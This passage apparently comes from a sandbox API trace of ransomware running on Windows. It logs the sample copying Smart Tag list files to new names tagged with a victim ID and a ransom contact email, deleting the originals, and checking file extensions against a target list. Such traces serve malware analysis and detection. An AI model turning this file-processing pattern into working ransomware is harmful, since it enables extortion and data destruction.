Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.989] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0042.990] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.990] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0042.991] GetLastError () returned 0x0 [0042.991] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x22d6, lpOverlapped=0x0) returned 1 [0042.996] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x22e0, lpOverlapped=0x0) returned 1 [0042.997] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.997] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.998] SetEndOfFile (hFile=0x210) returned 1 [0042.998] CloseHandle (hObject=0x210) returned 1 [0042.998] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.998] SetEndOfFile (hFile=0x204) returned 1 [0042.999] CloseHandle (hObject=0x204) returned 1 [0042.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.999] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 1 [0043.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.000] lstrlenW (lpString=".doc") returned 4 [0043.000] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.000] lstrlenW (lpString=".docx") returned 5 [0043.000] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0043.000] lstrlenW (lpString=".pdf") returned 4 [0043.000] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.000] lstrlenW (lpString=".xls") returned 4 [0043.000] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.000] lstrlenW (lpString=".xlsx") returned 5 [0043.000] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0043.000] lstrlenW (lpString=".ppt") returned 4 [0043.000] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.000] lstrlenW (lpString=".zip") returned 4 [0043.000] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.000] lstrlenW (lpString=".rar") returned 4 [0043.000] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.000] lstrlenW (lpString=".bz2") returned 4 [0043.000] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.000] lstrlenW (lpString=".7z") returned 3 [0043.000] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.000] lstrlenW (lpString=".dbf") returned 4 [0043.000] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.001] lstrlenW (lpString=".1cd") returned 4 [0043.001] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.001] lstrlenW (lpString=".jpg") returned 4 [0043.001] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.001] lstrlenW (lpString=".doc") returned 4 [0043.001] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString=".docx") returned 5 [0043.001] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0043.001] lstrlenW (lpString=".pdf") returned 4 [0043.001] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString=".xls") returned 4 [0043.001] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString=".xlsx") returned 5 [0043.001] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0043.001] lstrlenW (lpString=".ppt") returned 4 [0043.001] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.001] lstrlenW (lpString=".zip") returned 4 [0043.001] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.001] lstrlenW (lpString=".rar") returned 4 [0043.001] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString=".bz2") returned 4 [0043.001] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString=".7z") returned 3 [0043.001] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.001] lstrlenW (lpString=".dbf") returned 4 [0043.001] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.001] lstrlenW (lpString=".1cd") returned 4 [0043.001] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0043.002] lstrlenW (lpString=".jpg") returned 4 [0043.002] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.002] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0043.002] lstrlenW (lpString="PHONE.XML") returned 9 [0043.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.002] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1844) returned 1 [0043.002] CloseHandle (hObject=0x204) returned 1 [0043.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 0x20 [0043.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.002] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.003] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0043.003] GetLastError () returned 0x0 [0043.003] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x734, lpOverlapped=0x0) returned 1 [0043.004] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x740, lpOverlapped=0x0) returned 1 [0043.005] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.005] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0043.005] SetEndOfFile (hFile=0x210) returned 1 [0043.005] CloseHandle (hObject=0x210) returned 1 [0043.006] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.006] SetEndOfFile (hFile=0x204) returned 1 [0043.007] CloseHandle (hObject=0x204) returned 1 [0043.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.007] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 1 [0043.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.007] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.007] lstrlenW (lpString=".doc") returned 4 [0043.007] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.007] lstrlenW (lpString=".docx") returned 5 [0043.007] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0043.007] lstrlenW (lpString=".pdf") returned 4 [0043.007] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.007] lstrlenW (lpString=".xls") returned 4 [0043.007] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString=".xlsx") returned 5 [0043.008] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0043.008] lstrlenW (lpString=".ppt") returned 4 [0043.008] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.008] lstrlenW (lpString=".zip") returned 4 [0043.008] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.008] lstrlenW (lpString=".rar") returned 4 [0043.008] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString=".bz2") returned 4 [0043.008] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString=".7z") returned 3 [0043.008] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.008] lstrlenW (lpString=".dbf") returned 4 [0043.008] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.008] lstrlenW (lpString=".1cd") returned 4 [0043.008] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.008] lstrlenW (lpString=".jpg") returned 4 [0043.008] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.008] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.008] lstrlenW (lpString=".doc") returned 4 [0043.008] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString=".docx") returned 5 [0043.008] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0043.008] lstrlenW (lpString=".pdf") returned 4 [0043.008] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString=".xls") returned 4 [0043.008] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.008] lstrlenW (lpString=".xlsx") returned 5 [0043.008] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0043.009] lstrlenW (lpString=".ppt") returned 4 [0043.009] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.009] lstrlenW (lpString=".zip") returned 4 [0043.009] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.009] lstrlenW (lpString=".rar") returned 4 [0043.009] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.009] lstrlenW (lpString=".bz2") returned 4 [0043.009] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.009] lstrlenW (lpString=".7z") returned 3 [0043.009] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.009] lstrlenW (lpString=".dbf") returned 4 [0043.009] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.009] lstrlenW (lpString=".1cd") returned 4 [0043.009] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0043.009] lstrlenW (lpString=".jpg") returned 4 [0043.009] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.009] lstrcmpiW (lpString1=".DAT", lpString2=".php") returned -1 [0043.009] lstrlenW (lpString="STOCKS.DAT") returned 10 [0043.009] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.010] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=39017) returned 1 [0043.010] CloseHandle (hObject=0x204) returned 1 [0043.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 0x20 [0043.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.010] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.010] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0043.011] GetLastError () returned 0x0 [0043.011] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x9869, lpOverlapped=0x0) returned 1 [0043.013] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x9870, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x9870, lpOverlapped=0x0) returned 1 [0043.014] ReadFile (in: hFile=0x204, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.015] WriteFile (in: hFile=0x210, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0043.015] SetEndOfFile (hFile=0x210) returned 1 [0043.015] CloseHandle (hObject=0x210) returned 1 [0043.016] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.016] SetEndOfFile (hFile=0x204) returned 1 [0043.017] CloseHandle (hObject=0x204) returned 1 [0043.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.017] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 1 [0043.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.017] lstrlenW (lpString=".doc") returned 4 [0043.017] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0043.017] lstrlenW (lpString=".docx") returned 5 [0043.017] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0043.017] lstrlenW (lpString=".pdf") returned 4 [0043.017] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0043.017] lstrlenW (lpString=".xls") returned 4 [0043.017] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0043.017] lstrlenW (lpString=".xlsx") returned 5 [0043.017] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0043.017] lstrlenW (lpString=".ppt") returned 4 [0043.017] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0043.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.018] lstrlenW (lpString=".zip") returned 4 [0043.018] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString=".rar") returned 4 [0043.018] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString=".bz2") returned 4 [0043.018] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0043.018] lstrlenW (lpString=".7z") returned 3 [0043.018] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0043.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.018] lstrlenW (lpString=".dbf") returned 4 [0043.018] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.018] lstrlenW (lpString=".1cd") returned 4 [0043.018] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0043.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.018] lstrlenW (lpString=".jpg") returned 4 [0043.018] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.018] lstrlenW (lpString=".doc") returned 4 [0043.018] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString=".docx") returned 5 [0043.018] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0043.018] lstrlenW (lpString=".pdf") returned 4 [0043.018] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString=".xls") returned 4 [0043.018] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString=".xlsx") returned 5 [0043.018] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0043.018] lstrlenW (lpString=".ppt") returned 4 [0043.018] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0043.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.018] lstrlenW (lpString=".zip") returned 4 [0043.018] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0043.019] lstrlenW (lpString=".rar") returned 4 [0043.019] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0043.019] lstrlenW (lpString=".bz2") returned 4 [0043.019] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0043.019] lstrlenW (lpString=".7z") returned 3 [0043.019] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0043.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.019] lstrlenW (lpString=".dbf") returned 4 [0043.019] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0043.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.019] lstrlenW (lpString=".1cd") returned 4 [0043.019] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0043.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0043.019] lstrlenW (lpString=".jpg") returned 4 [0043.019] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0043.019] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0043.019] lstrlenW (lpString="STOCKS.XML") returned 10 [0043.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0043.019] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2687) returned 1 [0043.019] CloseHandle (hObject=0x204) returned 1 [0043.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 0x20 [0043.020] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: 